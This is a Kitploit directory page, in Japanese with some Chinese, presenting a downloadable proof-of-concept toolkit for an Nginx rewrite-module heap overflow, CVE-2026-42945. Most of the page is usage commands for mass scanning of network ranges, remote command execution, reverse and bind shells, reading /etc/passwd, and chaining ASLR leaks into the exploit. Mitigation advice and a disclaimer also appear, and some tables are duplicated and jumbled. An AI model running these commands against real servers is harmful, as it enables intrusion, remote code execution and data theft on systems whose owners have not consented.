Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-42945 — CVE-2026-42945 Nginx Rift | Kitploit
ツール/GitHubGitHub/liaoziqi-gzfls/cve-2026-42945
偵察脆弱性分析エクスプロイト情報収集ウェブセキュリティファジングペネトレーションテストペイロード開発バイナリエクスプロイト
GitHubliaoziqi-gzfls/cve-2026-42945

CVE-2026-42945

CVE-2026-42945 Nginx Rift

リポジトリを見る
173ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-42945 Nginx Rift - PoC ツールキット

CVE-2026-42945(Nginx Rift)向けの包括的な概念実証(PoC)ツールキットです。Nginx の ngx_http_rewrite_module に存在する深刻なヒープバッファオーバーフロー脆弱性です。


脆弱性の概要

項目詳細
CVE IDCVE-2026-42945
名称Nginx Rift
タイプヒープバッファオーバーフロー
コンポーネントngx_http_rewrite_module
深刻度緊急(CVSS 9.2)
影響を受けるバージョンNginx 0.6.27 - 1.30.0
修正バージョンNginx 1.30.1 / 1.31.0

根本原因

この脆弱性は、rewrite ルールを処理する際の 2 回の内部パス間でのサイズ計算の誤りに起因します。設定で以下の条件を使用している場合:

  • 名前のない正規表現キャプチャ($1、$2 など)
  • ? を含む置換文字列との組み合わせ

Nginx は最初のパスで必要なバッファサイズを誤って計算し、2 番目のパスで割り当てられたヒープバッファの範囲を超えて書き込みを行います。

脆弱な設定例

root@kitploit:~
server {
    # VULNERABLE: Unnamed capture ($1) + '?' in replacement
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

安全な設定例(パッチ適用済み)

root@kitploit:~
server {
    # SAFE: Named capture (?P<path>) replaces $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

ツールキットのコンポーネント

1. nginx_rift_poc.py - コア PoC ツール

単一ターゲットを対象とする脆弱性スキャナおよびエクスプロイトツールです。

機能:

  • Server ヘッダーから Nginx のバージョンを検出
  • バージョンが脆弱な範囲内かどうかを確認
  • ヒープオーバーフローを引き起こすように細工された HTTP ペイロードを送信
  • 脆弱/安全なテスト設定を生成

使用法:

root@kitploit:~
# Detect version and test vulnerability
python nginx_rift_poc.py -t target.example.com

# Test with custom payload
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS target
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# Generate vulnerable test configuration
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# Generate safe (patched) configuration
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py - バッチスキャナ

複数のターゲットを同時にテストするためのバッチスキャナです。

機能:

  • マルチスレッドスキャン(デフォルト 50 スレッド)
  • ファイルまたは CIDR ネットワーク範囲からターゲットリストを読み込み
  • 連携のための JSON 出力
  • ポート 443 の SSL を自動検出

使用法:

root@kitploit:~
# Scan from target file (format: host:port per line)
python nginx_rift_scanner.py -f targets.txt -o results.json

# Scan single target
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# Scan network range
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# High-speed scan
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

ターゲットファイルの形式:

root@kitploit:~
# Comments start with #
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py - 設定アナライザ

ローカルの Nginx 設定ファイルをスキャンして、脆弱な rewrite パターンを検出します。

機能:

  • nginx.conf を解析し、include ディレクティブを追跡
  • 置換文字列に ? を含む名前なしキャプチャを検出
  • 自動修正のサポート(バックアップ付き)
  • ディレクトリの再帰スキャン

使用法:

root@kitploit:~
# Scan single file
python config_checker.py /etc/nginx/nginx.conf

# Scan directory recursively
python config_checker.py -d /etc/nginx/conf.d/

# Auto-fix vulnerable patterns (creates .bak backup)
python config_checker.py --fix /etc/nginx/nginx.conf

# Auto-detect common Nginx paths
python config_checker.py

4. enhanced_poc.py - 拡張 RCE PoC

depthfirst の公式研究に基づく高度なエクスプロイトツールで、複数の rewrite パターンとエクスプロイトモードをサポートしています。

機能:

  • 8 種類の一般的な脆弱 rewrite パターン(/api/、/redirect/、/user/ など)を自動検出
  • 複数のオーバーフロー発火文字(+、&、=、%)をサポート
  • オーバーフローサイズを制御したスマートなペイロード生成
  • 複数のエクスプロイトモード:cmd / shell / bind / read
  • ASLR 無効環境向けのカスタムヒープ/libc ベースアドレス
  • フェイク ngx_pool_cleanup_s を使用した動的なスプレー本体の構築

使用法:

root@kitploit:~
# Auto-detect patterns and version
python enhanced_poc.py -t target.example.com --detect

# Execute command (ASLR off)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# Reverse shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# Bind shell
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# Read remote file
python enhanced_poc.py -t target.example.com --read /etc/passwd

# Custom heap base (for ASLR-off targets)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# Use & as overflow trigger
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

エクスプロイトモードの詳細:

アドレス設定(ASLR 無効時のみ):

  • --heap-base: ターゲットのヒープベースアドレス(例:0x555555559000)
  • --libc-base: libc のベースアドレス(例:0x7ffff77ba000)
  • --system-addr: system() の直接アドレス(libc-base を上書き)

5. aslr_leak_detector.py - ASLR リーク検出器

ASLR 保護をバイパスできる情報漏えいを検出するための総合スキャナです。

機能:

  • HTTP ヘッダー漏えい検出(Server、X-Powered-By など)
  • メモリアドレスとスタックトレースのエラーページ分析
  • Nginx 固有エンドポイントの探索(/nginx_status、/actuator/* など)
  • メモリアドレス漏えい検出(64 ビットポインタ、ヒープ/libc/スタックアドレス)
  • タイミング分析によるヒープレイアウトの探索
  • ASLR ステータスの推測(有効/無効/弱)
  • JSON レポートによる enhanced_poc.py との直接連携

使用法:

root@kitploit:~
# Scan single target
python aslr_leak_detector.py -t target.example.com

# Scan with SSL
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# Scan from file, save report
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# Scan network range
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# Quick scan mode
python aslr_leak_detector.py -t target.example.com --quick

拡張 PoC との連携:

root@kitploit:~
# Step 1: Detect leaks
python aslr_leak_detector.py -t target.example.com -o leak.json

# Step 2: Use leaked addresses for exploit
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

脆弱性検出の指標

PoC ツールは、以下の指標を通じて脆弱性を識別します:

指標説明
接続の切断ターゲットが予期せず接続を閉じる(ワーカーのクラッシュ)
ゲートウェイエラーHTTP 502/503/504 応答(ワーカープロセスの停止)
応答の遅延応答時間が大幅に増加する(クラッシュからの復旧)

インストール

外部依存関係は不要です。Python 標準ライブラリのみを使用します。

root@kitploit:~
# Clone or download the toolkit
git clone <repository-url>
cd CVE-2026-42945

# Verify Python version (3.7+ recommended)
python3 --version

# Run any tool
python3 nginx_rift_poc.py --help

影響を受けるバージョン


緩和策

緊急の対応

  1. Nginx をバージョン 1.30.1(安定版)または 1.31.0(メインライン版)にパッチ適用する
  2. 脆弱な rewrite パターンがないか設定を監査する
  3. Nginx ワーカープロセスを実行しているすべてのホストで ASLR を有効化する

設定による回避策

直ちにパッチを適用できない場合は、名前なしキャプチャを名前付きキャプチャに置き換えます:

root@kitploit:~
# BEFORE (VULNERABLE)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# AFTER (SAFE)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

WAF 仮想パッチ

脆弱な rewrite パターンを標的とした不正なリクエストをブロックする WAF ルールを展開します。


免責事項

本ツールキットは、許可されたセキュリティテストおよび研究目的のみで使用してください。

  • 所有しているシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください
  • コンピュータシステムへの不正アクセスは違法です
  • 著作者は、本ツールの誤用または本ツールによって引き起こされた損害について責任を負いません
  • 本番環境で使用する前に、必ず隔離された環境でテストしてください

関連する CVE

この欠陥は、他の 3 つのメモリ破壊の問題とともに発見されました:

CVE説明深刻度
CVE-2026-42946SCGI/UWSGI のメモリ割り当ての欠陥高
CVE-2026-40701OCSP の DNS 解決における Use-after-free中
CVE-2026-42934UTF-8 解析の範囲外読み取り中

参考リンク

  • F5 セキュリティアドバイザリ
  • Nginx セキュリティ
  • CVE-2026-42945 の詳細

ライセンス

このプロジェクトは、教育目的および許可されたセキュリティテスト目的で提供されます。


作者: Security Research Team 日付: 2026-06-11


中国語の説明(中国語ドキュメント)

脆弱性の概要

CVE-2026-42945(Nginx Rift)は、Nginx の ngx_http_rewrite_module モジュールにおけるヒープバッファオーバーフロー脆弱性です。2008 年(Nginx 0.6.27)から存在し、約 18 年間潜伏していました。

脆弱性の原理

rewrite ルールを処理する際、Nginx は内部で 2 回の解析を行います。設定が以下の 2 つの条件を同時に満たす場合:

  1. 名前のない正規表現キャプチャを使用する($1、$2 など)
  2. 置換文字列に ? 文字が含まれる

Nginx は 1 回目の解析でバッファサイズを誤って計算し、2 回目の解析でヒープバッファの境界を超えてデータを書き込み、ヒープオーバーフローを引き起こします。

脆弱な設定例(脆弱性あり)

root@kitploit:~
server {
    # 有漏洞:未命名捕获 $1 + 替换字符串中的 ?
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

安全な設定例(修正済み)

root@kitploit:~
server {
    # 安全:使用命名捕获 (?P<name>) 替代 $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

ツールコンポーネントの説明

1. nginx_rift_poc.py — コア PoC ツール

単一ターゲットの脆弱性検出およびエクスプロイトツールです。

機能:

  • Server レスポンスヘッダーから Nginx のバージョンを検出
  • バージョンが脆弱な範囲内かどうかを判定
  • 巧妙に構築された HTTP リクエストを送信してヒープオーバーフローを発火
  • テスト用の脆弱/安全な設定を生成

使用例:

root@kitploit:~
# 检测版本并测试漏洞
python nginx_rift_poc.py -t target.example.com

# 使用自定义 Payload 测试
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS 目标
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# 生成脆弱测试配置
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# 生成安全(已修复)配置
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py — バッチスキャナ

複数のターゲットをマルチスレッドで並行スキャンします。

機能:

  • デフォルトで 50 スレッドによる並行スキャン
  • ファイルまたは CIDR ネットワーク範囲からターゲットを読み込むことをサポート
  • JSON 形式での結果出力
  • ポート 443 の SSL 接続を自動識別

使用例:

root@kitploit:~
# 从目标文件扫描(格式:每行 host:port)
python nginx_rift_scanner.py -f targets.txt -o results.json

# 扫描单个目标
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# 扫描整个网段
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# 高速扫描(100线程)
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

ターゲットファイルの形式:

root@kitploit:~
# 井号开头的行为注释
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py — 設定ファイルチェッカー

ローカルの Nginx 設定ファイルをスキャンし、脆弱な rewrite パターンを検出します。

機能:

  • nginx.conf を解析し、include で参照されているファイルを再帰的に解析
  • 名前なしキャプチャ + ? を含む rewrite ディレクティブを検出
  • 自動修正をサポート(.bak バックアップを自動作成)
  • ディレクトリを再帰的にスキャン

使用例:

root@kitploit:~
# 扫描单个文件
python config_checker.py /etc/nginx/nginx.conf

# 递归扫描目录
python config_checker.py -d /etc/nginx/conf.d/

# 自动修复脆弱配置(自动备份原文件)
python config_checker.py --fix /etc/nginx/nginx.conf

# 自动探测常见 Nginx 配置路径
python config_checker.py

4. enhanced_poc.py — 拡張版 RCE PoC

depthfirst の公式研究に基づく高度な脆弱性エクスプロイトツールで、複数の rewrite パターンと利用方法をサポートしています。

機能:

  • 8 種類の一般的な脆弱 rewrite パターン(/api/、/redirect/、/user/ など)を自動検出
  • 複数のオーバーフロー発火文字(+、&、=、%)をサポート
  • スマートなペイロード生成により、オーバーフローサイズを正確に制御
  • 複数の利用モード:cmd / shell / bind / read
  • カスタムヒープ/libc ベースアドレス(ASLR 無効環境用)
  • フェイク ngx_pool_cleanup_s を含むスプレー本体を動的に構築

オーバーフロー発火文字の拡張表:

使用例:

root@kitploit:~
# 自动探测配置模式和版本
python enhanced_poc.py -t target.example.com --detect

# 执行命令(ASLR 关闭环境)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# 反弹 Shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# 绑定 Shell(在目标上监听)
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# 读取远程文件
python enhanced_poc.py -t target.example.com --read /etc/passwd

# 自定义堆基址
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# 使用 & 作为溢出触发字符
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

利用モードの説明:

アドレス設定(ASLR 無効環境のみ):

  • --heap-base: ターゲットのヒープベースアドレス(例:0x555555559000)
  • --libc-base: libc ベースアドレス(例:0x7ffff77ba000)
  • --system-addr: system() アドレスを直接指定

5. aslr_leak_detector.py — ASLR 情報漏えい検出ツール

ASLR 保護をバイパスするために悪用可能な情報漏えいを検出する総合スキャナです。

機能:

  • HTTP レスポンスヘッダーの漏えい検出(Server、X-Powered-By など)
  • エラーページの分析(メモリアドレス、スタックトレース)
  • Nginx 固有エンドポイントの探索(/nginx_status、/actuator/* など)
  • メモリアドレス漏えいの検出(64 ビットポインタ、ヒープ/libc/スタックアドレス)
  • ヒープレイアウトの探索(応答時間の差異からメモリ状態を推測)
  • ASLR ステータスの推測(有効/無効/弱)
  • JSON レポートを介して enhanced_poc.py と直接連携

使用例:

root@kitploit:~
# 扫描单个目标
python aslr_leak_detector.py -t target.example.com

# SSL 扫描
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# 从文件批量扫描并保存报告
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# 扫描网段
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# 快速扫描
python aslr_leak_detector.py -t target.example.com --quick

拡張版 PoC との連携使用:

root@kitploit:~
# 步骤 1:检测信息泄露
python aslr_leak_detector.py -t target.example.com -o leak.json

# 步骤 2:使用泄露的地址进行利用
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

脆弱性検出の指標

PoC ツールは以下の現象によって、ターゲットに脆弱性が存在するかどうかを判断します:

検出指標説明
接続の切断ターゲットが異常に接続を閉じる(Worker プロセスのクラッシュ)
ゲートウェイエラーHTTP 502/503/504 を返す(Worker プロセスが停止)
応答の遅延

インストール方法

サードパーティの依存関係は不要で、Python 標準ライブラリのみで実行できます。

root@kitploit:~
# 克隆或下载工具包
git clone <repository-url>
cd CVE-2026-42945

# 验证 Python 版本(推荐 3.7+)
python3 --version

# 查看工具帮助
python3 nginx_rift_poc.py --help

影響を受けるバージョン


緩和策

緊急時の対応推奨事項

  1. Nginx を 1.30.1(安定版)または 1.31.0(メインライン版)に直ちにアップグレードする
  2. 設定ファイルに脆弱な rewrite パターンが存在するか監査する
  3. ASLR(アドレス空間配置のランダム化)を有効にし、RCE の悪用を困難にする

一時的な緩和策(直ちにアップグレードできない場合)

名前なしキャプチャを名前付きキャプチャに置き換えます:

root@kitploit:~
# 修改前(有漏洞)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# 修改后(安全)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

WAF 仮想パッチ

脆弱な rewrite パターンを標的とした悪意のあるリクエストを遮断する WAF(Web アプリケーションファイアウォール)ルールを展開します。


免責事項

本ツールキットは、許可されたセキュリティテストおよび研究目的のみに使用してください。

  • 所有権を持つ、または明確な許可を得たシステムに対してのみ本ツールを使用してください
  • コンピュータシステムへの不正アクセスは違法行為です
  • 著作者は本ツールの誤用、または生じた損害について責任を負いません
  • 本番環境で使用する前に、必ず隔離された環境でテストしてください

関連する脆弱性

この脆弱性は、depthfirst の AI 駆動型静的解析システムによって発見された一連のメモリ破壊問題の 1 つです:

CVE ID説明深刻度
CVE-2026-42946SCGI/UWSGI のメモリ割り当ての欠陥高
CVE-2026-40701OCSP DNS 解決における UAF中
CVE-2026-42934UTF-8 解析の範囲外読み取り中

参考リンク

  • F5 セキュリティアドバイザリ
  • Nginx セキュリティアドバイザリ
  • CVE-2026-42945 の詳細
  • SonicWall 技術分析
  • Cloud Security Alliance 調査レポート

オープンソースライセンス

本プロジェクトは教育目的および許可されたセキュリティテスト専用です。


作者: Security Research Team 日付: 2026-06-11

ツールをダウンロード
モード説明出力
cmd単一のシェルコマンドを実行ターゲット上のコマンド出力
shellリバースシェルを起動--listen-ip:listen-port に接続を戻す
bindターゲット上でバインドシェルを起動ターゲット上の --listen-port で待ち受け
readターゲットからファイルを読み取る内容は /tmp/nginx_rift_read に書き込まれる
空の応答ベースラインと比較して応答ボディが消える
バージョンの一致検出された Nginx バージョンが脆弱な範囲内
製品影響を受けるバージョン修正バージョン
Nginx オープンソース版0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress Controllerパッチ未適用の全バージョン修正済みリリースに更新
Nginx Gateway Fabricパッチ未適用の全バージョン修正済みリリースに更新
項目詳細
CVE IDCVE-2026-42945
脆弱性の名称Nginx Rift
脆弱性のタイプヒープバッファオーバーフロー
影響を受けるコンポーネントngx_http_rewrite_module
深刻度緊急(CVSS 9.2)
影響を受けるバージョンNginx 0.6.27 - 1.30.0
修正バージョンNginx 1.30.1 / 1.31.0
文字拡張後文字あたりのオーバーフロー
+%2B+2 バイト
&%26+2 バイト
=%3D+2 バイト
%%25+2 バイト
空白%20+2 バイト
モード説明出力
cmd単一のシェルコマンドを実行コマンドの出力がターゲット上に保存される
shellリバースシェルを生成--listen-ip:listen-port に接続を戻す
bindバインドシェルを生成ターゲット上の --listen-port で待ち受ける
readターゲットのファイルを読み取る内容は /tmp/nginx_rift_read に書き込まれる
応答時間が著しく増加(プロセスクラッシュ後の自動再起動)
空のレスポンスボディベースラインと比較してレスポンスボディが空(Worker がクラッシュ)
バージョンの一致検出された Nginx バージョンが脆弱な範囲内
製品影響を受けるバージョン修正バージョン
Nginx オープンソース版0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress Controllerパッチ未適用の全バージョン修正済みバージョンに更新
Nginx Gateway Fabricパッチ未適用の全バージョン修正済みバージョンに更新